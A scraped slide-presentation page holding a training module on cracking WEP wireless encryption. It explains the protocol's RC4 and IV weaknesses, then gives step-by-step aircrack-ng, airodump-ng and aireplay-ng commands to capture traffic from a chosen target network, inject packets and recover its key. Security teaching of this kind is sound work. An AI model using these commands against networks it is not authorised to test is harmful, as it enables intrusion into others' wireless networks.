Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00

Slides:



Advertisements
Similar presentations
Overview How to crack WEP and WPA
Advertisements

Crack WEP Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
Wireless Cracking By: Christopher Zacky.
IEEE i IT443 Broadband Communications Philip MacCabe October 5, 2005
Crack WPA Lab Last Update Copyright 2014 Kenneth M. Chipps Ph.D.
CSE  Wired Equivalent Privacy (WEP) ◦ first security protocol defined in  Wi-Fi Protected Access (WPA) ◦ defined by Wi-Fi Alliance 
WLAN Security: Cracking WEP/WPA
Attack and Defense in Wireless Networks Presented by Aleksandr Doronin.
1 MD5 Cracking One way hash. Used in online passwords and file verification.
Wireless Networks: Signaling and Security William Tucker CEN 4516: Computer Networks FGCU: Fort Myers, FL: 09/05.
Wireless LAN Security Jerry Usery CS 522 December 6 th, 2006.
The Trouble with WEP Or, cracking WiFi networks for fun & profit (not really) Jim Owens.
Wireless Network Security: WEP And Beyond Heidi Parsaye Jason DeVries Roxanne Ilse Heidi Parsaye - Jason DeVries - Roxanne Ilse.
Wired Equivalent Privacy (WEP)
Vulnerability In Wi-Fi By Angus U CS 265 Section 2 Instructor: Mark Stamp.
Wireless Security Presentation by Paul Petty and Sooner Brooks-Heath.
WIRELESS NETWORK SECURITY. Hackers Ad-hoc networks War Driving Man-in-the-Middle Caffe Latte attack.
© 2006 Cisco Systems, Inc. All rights reserved.Cisco PublicITE I Chapter 6 1 Wireless Technologies Networking for Home and Small Businesses – Chapter 7.
WLAN What is WLAN? Physical vs. Wireless LAN
© 2013 The McGraw-Hill Companies, Inc. All rights reserved Mike Meyers’ CompTIA A+ ® Guide to 802: Managing and Troubleshooting PCs Fourth Edition (Exam.
Ch. 5 – Access Points. Overview Access Point Connection.
Computer Networks. Network Connections Ethernet Networks Single wire (or bus) runs to all machines Any computer can send info to another computer Header.
Wireless security & privacy Authors: M. Borsc and H. Shinde Source: IEEE International Conference on Personal Wireless Communications 2005 (ICPWC 2005),
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Wireless Technologies Networking for Home and Small Businesses – Chapter.
Copyright © 2007 Heathkit Company, Inc. All Rights Reserved PC Fundamentals Presentation 50 – The Wireless LAN.
Wireless Networking.
A History of WEP The Ups and Downs of Wireless Security.
Ethical Hacking Defeating Wireless Security. 2 Contact Sam Bowne Sam Bowne Computer Networking and Information Technology Computer Networking and Information.
Wireless Network Security Dr. John P. Abraham Professor UTPA.
Lesson 20-Wireless Security. Overview Introduction to wireless networks. Understanding current wireless technology. Understanding wireless security issues.
Wireless Networking Concepts By: Forrest Finkler Computer Science 484 Networking Concepts.
Wireless Encryption: WEP and cracking it. Eric Shea.
CWSP Guide to Wireless Security Chapter 2 Wireless LAN Vulnerabilities.
Hands-On Ethical Hacking and Network Defense Lecture 14 Cracking WEP Last modified
Wireless LAN Security. Security Basics Three basic tools – Hash function. SHA-1, SHA-2, MD5… – Block Cipher. AES, RC4,… – Public key / Private key. RSA.
Wireless Network Security Presented by: Prabhakaran Theertharaman.
Wireless Networking & Security Greg Stabler Spencer Smith.
20 November 2015 RE Meyers, Ms.Ed., CCAI CCNA Discovery Curriculum Review Networking for Home and Small Businesses Chapter 7: Wireless Technologies.
WLANs & Security Standards (802.11) b - up to 11 Mbps, several hundred feet g - up to 54 Mbps, backward compatible, same frequency a.
Lesson 10: Configuring Network Settings MOAC : Configuring Windows 8.1.
Wireless Security Rick Anderson Pat Demko. Wireless Medium Open medium Broadcast in every direction Anyone within range can listen in No Privacy Weak.
KSU 2015-Summer Cyber Security | Group 1 | Seul Alice Bang Get a Wifi Password.
Wireless Security John Himmelein Erick Andrew Christian Adam Varun Bapna.
WLAN Security1 Security of WLAN Máté Szalay
© 2007 Cisco Systems, Inc. All rights reserved.Cisco Public ITE PC v4.0 Chapter 1 1 Wireless Technologies Networking for Home and Small Businesses – Chapter.
WPA Cracking with Rainbow Tables For Educational Purposes Only Kurt Wondra November 18 th, 2010  1) Scanning for Vulnerable Networks  2) Capturing Usable.
Tightening Wireless Networks By Andrew Cohen. Question Why more and more businesses aren’t converting their wired networks into wireless networks?
© 2003, Cisco Systems, Inc. All rights reserved. FWL 1.0— © 2003, Cisco Systems, Inc. All rights reserved.
Module 48 (Wireless Hacking)
TERMINOLOGY Define: WPAN
OSA vs WEP WPA and WPA II Tools for hacking
Advanced Penetration testing
Wireless Technologies
Wireless Protocols WEP, WPA & WPA2.
Presented By: Rohit Maurya
We will talking about : What is WAP ? What is WAP2 ? Is there secure ?
Securing A Wireless Network
Wireless Modes.
Only For Education Purpose
Wireless LAN Security CSE 6590.
Wireless Hacking.
Wireless Security Ian Bodley.
WEEK 1.
Hacking Wi-Fi Beyond Script Kiddie and WEP
Wireless Network Security
Breaking into Wi-Fi Networks
WLAN Security Antti Miettinen.
Antti Miettinen (modified by JJ)
Security Issues with Wireless Protocols
Brian “Hermit” Mork PwnSchool
Presentation transcript:

Wireless Attacks: WEP Module Type: Basic Method Module Number: 0x00 Last Updated: 2017-01-01 Author: Hermit

Topics Common Terminology What is WEP? How is WEP Vulnerable? The Attack: Step by Step Additional resources

Common Terminology Wireless Local Area Network (WLAN) A network that is connected wirelessly instead of with physical cables. Clients communicate with access points (AP), which relay traffic to external networks. Defined by the 802.11 specification. Radio Frequency (RF) An electromagnetic wave, such as AM or FM radio. When referring to WLANs we use pre-defined values called channels, numbered from 1 through 14 Initialization Vector (IV) A number intended to be used only once as a random seed (alongside a common secret) in cryptography, to uniquely encode data. IVs are also sometimes called “nonces” (meaning “used only once”).

Common Terminology The 802.11 specification defines seven modes for wireless network devices: Master: Act as an AP Managed: Act as a client Monitor: Monitor all traffic, not just one network, without associating first Promiscuous: Pass all traffic to the CPU, does require associating first, but allows injection back into associated networks Ad-hoc: There is no central AP or infrastructure. Each device communicates directly with each other device. Ad-hoc and mesh are not exclusive. Mesh: Each device can relay/route packets for other devices, but devices do not communicate directly with each other. Repeater: Act as a ”dumb” repeater and retransmit received signals.

Common Terminology Service Set Identifier (SSID) Basic SSID (BSSID) The human readable “friendly” name of a WLAN. Basic SSID (BSSID) The MAC address of an AP. Extended SSID (ESSID) A collection of BSSIDs, functionally considered equivalent to an SSID.

What is WEP? Wired Equivalency Privacy (WEP) is a security protocol for WLANs, which suffers from a variety of cryptographic and design weaknesses. It was part of the 802.11a specification, but is now completely deprecated. It uses either a 64-bit or 128-bit key, each of which includes a 24-bit IV. 64 bit = 24 bit IV + 40 bit secret key 128 bit = 24 bit IV + 104 bit secret key It uses the RC4 stream cipher to encrypt. It is useless from a security perspective and easily cracked.

How is WEP Vulnerable? RC4 depends upon a truly random key, but WEP uses RC4 with a fixed pre-shared key (of 40 or 104 bits) and a very small IV or nonce (of 24 bits). Since the majority of each encryption is done using the same value, only a portion of the encryption must be recovered. In the worst case scenario using modern attacks, it only takes around 50,000 IV captures to completely recover the key because the IV will be reused. Even worse, the design of WEP allows an attacker to modify a captured packet to “just ask” for more packets which will assist in decrypting.

Attack Setup This assumes that you have a 2016 release of Kali Linux installed, as well as hardware capable of being put into monitor mode. If in doubt, get an Alfa card. All commands are expected to be run with superuser (i.e. root) privileges. The aircrack-ng suite is expected to be part of the installation.

The Attack: Step by Step (Overview) Open a terminal window. Kill any potentially conflicting applications/services. Identify your wireless device. Put your wireless device into monitor mode. Verify monitor mode. Identify target network. Begin packet capture from target network. (optional) Stimulate IV collection. Crack WEP shared key.

The Attack: Step 1 Open a terminal window… no graphics here, because if you can’t do this part then the rest of this guide is really beyond you.

The Attack: Step 2 Kill any potentially conflicting applications/services. airmon-ng check kill

The Attack: Step 3 Identify your wireless device (we’ll use “wlan0” for this tutorial) ifconfig -a

The Attack: Step 4 Put your wireless device into monitor mode. airmon-ng start wlan0

The Attack: Step 5 Verify monitor mode. ifconfig -a

The Attack: Step 6 Identify target network (write down SSID, channel, and BSSID) airodump-ng wlan0mon

The Attack: Step 7 Begin packet capture from target network. airodump-ng --channel {#} --ivs --bssid {BSSID} -w wep-file wlan0mon

The Attack: Step 8 (optional) Stimulate IV collection. Run this in a separate terminal window while leaving the other programs executing: aireplay-ng -2 -b {BSSID} -t 1 -c FF:FF:FF:FF:FF:FF -p 0481 wlan0mon

The Attack: Step 9 Crack WEP shared key (your file name will vary based upon how many times you have started the capture). aircrack-ng wep-file-01.ivs Leave this running and it will automatically retry whenever a new candidate IV capture threshold is reached until the key is recovered.

Questions?

Additional Resources Technical overview of WEP/WPA cracking methods: https://dl.aircrack-ng.org/breakingwepandwpa.pdf Hermit https://twitter.com/hermit_hacker https://www.cryptolingus.net/ https://www.stackattack.net/blog/